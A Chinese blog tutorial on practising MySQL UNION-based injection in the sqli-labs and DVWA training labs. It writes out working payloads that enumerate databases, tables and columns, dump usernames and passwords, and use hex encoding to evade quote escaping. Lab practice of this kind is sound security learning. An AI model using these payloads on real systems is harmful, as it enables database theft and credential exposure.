MySQL注入基础练习


Posted in MySQL onMay 30, 2021

以sqli-labs-master作为练习

初始:简单获取基础内容

第一步,使用拼接的方式决定注入类型

MySQL注入基础练习

第二部,使用order by确定有表单有几列值

order by根据指定的列对结果集进行排序

MySQL注入基础练习

第三步,使用union select 来找到内容,获取想要得到内容

union select :联合查询

MySQL注入基础练习

进阶,通过mysql注入获取表单内容,托库;

第一步:通过数据库语句进行搜索,首先确定数据库

MySQL注入基础练习

第二部:确定数据库后,爆出它的表;

MySQL注入基础练习

第三步:确定表以后,可根据实际需求爆表,这里以users举例,进行爆字段

MySQL注入基础练习

第四部:确定字段后,我们就可以拖库;

MySQL注入基础练习

DVWA训练基础 low级别

1.参照上文确定当前库

1' union select (select database()),2 -- -

MySQL注入基础练习

2.确定库后,爆表

1' union select (select group_concat(table_name) from information_schema.tables where table_schema = 'dvwa'),2 -- -

MySQL注入基础练习

3.确定表后,爆字段

1' union select (select group_concat(column_name) from information_schema.columns where table_schema = 'dvwa' and table_name='users'),2 -- -

MySQL注入基础练习

4.确定字段后,进行拖库

1' union select (select group_concat(concat_ws(0x7e,user,password))from users),2 -- -

MySQL注入基础练习

级别Medium

与low级别不同,没有输入框,只有选择项,所以需要借助bp工具

MySQL注入基础练习

1.打开代理使用bp进行抓包并发送到Repeater模块进行反复验证

MySQL注入基础练习

2.其余步骤参考上文:暴库

MySQL注入基础练习

爆表

ps:因为后台强制转译的问题,要注意避免单引号

MySQL注入基础练习

爆字段

同爆表,因为转译的问题,要注意避免引号,可使用编译规避;

1 union  select 1,(select group_concat(column_name) from information_schema.columns where table_schema = (select database()) and table_name=0x7573657273)

MySQL注入基础练习

拖库

MySQL注入基础练习

MySQL 相关文章推荐
MySQL锁机制
Apr 05 MySQL
MySQL中出现乱码问题的终极解决宝典
May 26 MySQL
MySQL8.0无法启动3534的解决方法
Jun 03 MySQL
MySQL 如何设计统计数据表
Jun 15 MySQL
如何搭建 MySQL 高可用高性能集群
Jun 21 MySQL
MySQL8.0.18配置多主一从
Jun 21 MySQL
MySQL对数据表已有表进行分区表的实现
Nov 01 MySQL
mysql5.7的安装及Navicate长久免费使用的实现过程
Nov 17 MySQL
SQL语法CONSTRAINT约束操作详情
Jan 18 MySQL
MySQL限制查询和数据排序介绍
Mar 25 MySQL
mysql实现将字符串字段转为数字排序或比大小
Jun 14 MySQL
MySQL分布式恢复进阶
Jul 23 MySQL
解决Navicat for MySQL 连接 MySQL 报2005错误的问题
MYSQL(电话号码,身份证)数据脱敏的实现
May 28 #MySQL
MySql开发之自动同步表结构
mysql升级到5.7时,wordpress导数据报错1067的问题
May 27 #MySQL
解决Navicat for Mysql连接报错1251的问题(连接失败)
Navicat for MySQL的使用教程详解
MySQL Router实现MySQL的读写分离的方法
You might like
PHP 5.3.0 安装分析心得
2009/08/07 PHP
PHP的反射机制实例详解
2017/03/29 PHP
PHP使用正则表达式实现过滤非法字符串功能示例
2018/06/04 PHP
Laravel (Lumen) 解决JWT-Auth刷新token的问题
2019/10/24 PHP
Google 静态地图API实现代码
2010/11/19 Javascript
Package.js  现代化的JavaScript项目make工具
2012/05/23 Javascript
jquery 中多条件选择器,相对选择器,层次选择器的区别
2012/07/03 Javascript
jQuery实现的一个tab切换效果内部还嵌有切换
2014/08/10 Javascript
javascript实现的字符串与十六进制表示字符串相互转换方法
2015/07/17 Javascript
浅析JS获取url中的参数实例代码
2016/06/14 Javascript
JS实现中国公民身份证号码有效性验证
2017/02/20 Javascript
js字符串与Unicode编码互相转换
2017/05/17 Javascript
原生JavaScript实现的简单省市县三级联动功能示例
2017/05/27 Javascript
详解vue.js移动端导航navigationbar的封装
2017/07/05 Javascript
详谈JS中数组的迭代方法和归并方法
2017/08/11 Javascript
JavaScript实现兼容IE6的收起折叠与展开效果实例
2017/09/20 Javascript
微信小程序使用slider设置数据值及switch开关组件功能【附源码下载】
2017/12/09 Javascript
基于js 各种排序方法和sort方法的区别(详解)
2018/01/03 Javascript
jQuery+datatables插件实现ajax加载数据与增删改查功能示例
2018/04/17 jQuery
详解vue后台系统登录态管理
2019/04/02 Javascript
ES6使用 Array.includes 处理多重条件用法实例分析
2020/03/02 Javascript
JavaScript中展开运算符及应用的实例代码
2021/01/14 Javascript
[00:52]黑暗之门更新 新英雄孽主驾临DOTA2
2016/08/24 DOTA
Python在for循环中更改list值的方法【推荐】
2018/08/17 Python
Python爬虫beautifulsoup4常用的解析方法总结
2019/02/25 Python
python求最大值,不使用内置函数的实现方法
2019/07/09 Python
Python实现PyPDF2处理PDF文件的方法示例
2019/09/25 Python
利用python实现AR教程
2019/11/20 Python
解决Python import .pyd 可能遇到路径的问题
2021/03/04 Python
澳大利亚排名第一的狂热牛仔品牌:ONETEASPOON
2018/11/20 全球购物
Ray-Ban雷朋太阳眼镜英国官网:Ray-Ban UK
2019/11/23 全球购物
电影开国大典观后感
2015/06/04 职场文书
运动会广播稿200字
2015/08/19 职场文书
遇事可以测出您的见识与格局
2019/09/16 职场文书
python文件目录操作之os模块
2021/05/08 Python
MySQL索引知识的一些小妙招总结
2021/05/10 MySQL